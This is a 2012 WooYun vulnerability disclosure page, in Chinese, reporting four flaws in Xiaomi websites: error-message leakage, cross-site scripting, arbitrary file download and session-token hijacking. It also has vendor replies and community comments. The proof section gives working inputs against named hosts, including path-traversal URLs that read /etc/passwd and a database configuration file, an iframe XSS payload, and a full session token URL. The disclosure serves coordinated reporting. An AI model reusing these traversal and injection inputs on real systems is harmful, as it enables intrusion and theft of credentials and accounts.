当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-04413

漏洞标题:小米科技网站群漏洞集锦

相关厂商:小米科技

漏洞作者: 猪哥靓

提交时间:2012-02-11 11:55

修复时间:2012-03-27 11:56

公开时间:2012-03-27 11:56

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-02-11: 细节已通知厂商并且等待厂商处理中
2012-02-11: 厂商已经确认,细节仅向厂商公开
2012-02-21: 细节向核心白帽子及相关领域专家公开
2012-03-02: 细节向普通白帽子公开
2012-03-12: 细节向实习白帽子公开
2012-03-27: 细节向公众公开

简要描述:

施主,贫僧自东土大唐而来,去往帝都小米科技求手机的。

详细说明:

1:网站+论坛的错误信息泄露
2:跨站攻击
3:任意文件下载
4:会话管理隐患
后续有新发现会继续更新。

漏洞证明:

1:网站+论坛的错误信息泄露
http://res.api.miui.com/index.php
http://bbs.xiaomi.com/uc_server/control/admin/db.php
http://bbs.miliao.com/uc_server/control/admin/db.php
http://ucenter.miui.com/uc_server/control/admin/db.php
http://www.xiaomigongshe.com/wp-admin/includes/admin.php
http://resource.xiaomi.net/






2:跨站攻击
munion.xiaomi.com/index.php?mod=<iframe src=//>
3:任意文件下载
http://180.186.32.249/web/common/getfile.jsp?p=/../../../../../etc/passwd
http://180.186.32.249/web/common/getfile.jsp?p=/../../../../../opt/uficc/web/admin/login.jsp
http://180.186.32.249/web/common/getfile.jsp?p=/../../../../../opt/uficc/icc_config/Proxool.properties


数据库帐号密码


4:会话管理隐患

http://order.xiaomi.com/site/callback?referer=http%3A%2F%2Fwww.xiaomi.com%2F&token=S8yHMDpLJ0Lc432m%2BJAQm5eNQxFBlRS7MbwAUj4KKM167uPKTdiZOfg0%2F1H05maHjIvK0PF1ddFL%2B2oWju0Y1z0MNNfWO0DkMw0rloN%2FCGPUNx32vPCtZdpiY8ipQJsqku3cYSBn6IjHNbbahQvHCktF%2BFtTRew3gFE1se%2BfyVLIquEbGayAlk8ZLlfF2QCOZcnTTzhLoZIWltApcgkcL01uY84SYzYn29iczPjsWuE%3D


在任意第三方获取token后可劫持该帐号,且不论该帐号修改了密码均可劫持帐户,并没有时间限制(同时未进行二次会话验证,),只要一个token在手,实时有效。

修复方案:

1:关闭php错误信息显示
2:过滤非法敏感参数
3:可以使用服务器的用户权限来解决。
4:加油!

版权声明:转载请注明来源 猪哥靓@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-02-11 13:03

厂商回复:

前三项都是边缘业务或资源网站问题,已确认
最后一项在确认中,多谢

最新状态:

暂无


漏洞评价:

评论

  1. 2012-02-11 12:06 | 歌颂 ( 实习白帽子 | Rank:36 漏洞数:5 | #1024)

    托手机哥来了。。

  2. 2012-02-11 12:13 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    都是手机惹的祸啊

  3. 2012-02-11 12:16 | pestu ( 普通白帽子 | Rank:170 漏洞数:13 | 关注计算机网络安全 lnmpa技术)

    人多力量大啊,之前已经爆了各种XXOO,现在又来了一个集锦!猪哥靓 V5

  4. 2012-02-11 12:17 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    猪老大,V5

  5. 2012-02-11 12:35 | 猪哥靓 ( 普通白帽子 | Rank:414 漏洞数:51 | 他们又懂我在想什么吗?我又懂他们在想什么...)

    @xsser 我的htc hd2摔坏了。昨日看到贱心用的iphone聊qq羡慕不宜,遂想获取一部国产手机。好歹我也是miui系统的忠实用户。

  6. 2012-02-11 12:38 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    表示对站群漏洞集锦,此标题及内容灰常感兴趣。快快公开啊

  7. 2012-02-11 21:51 | Ambulong ( 普通白帽子 | Rank:113 漏洞数:14 | 保佑中啊~放了一星期的东西,别误会啦~)

    @小米科技 真的能有手机吗?

  8. 2012-02-13 09:45 | 神刀 ( 路人 | Rank:23 漏洞数:3 | www.shellsec.com内射那么牛,虾米没妹子?)

    有的话我也丢个集合

  9. 2012-03-27 12:13 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    这个大神都是怎么发现的啊

  10. 2012-03-28 14:48 | hellok ( 普通白帽子 | Rank:123 漏洞数:10 | 酱油党路过)

    围观。围观

  11. 2012-04-24 23:56 | 小猪太子 ( 实习白帽子 | Rank:41 漏洞数:8 | 地球人)

    送手机啊?这么好啊!比企鹅好

  12. 2013-06-30 11:23 | Night ( 实习白帽子 | Rank:57 漏洞数:16 )

    比企鹅好多了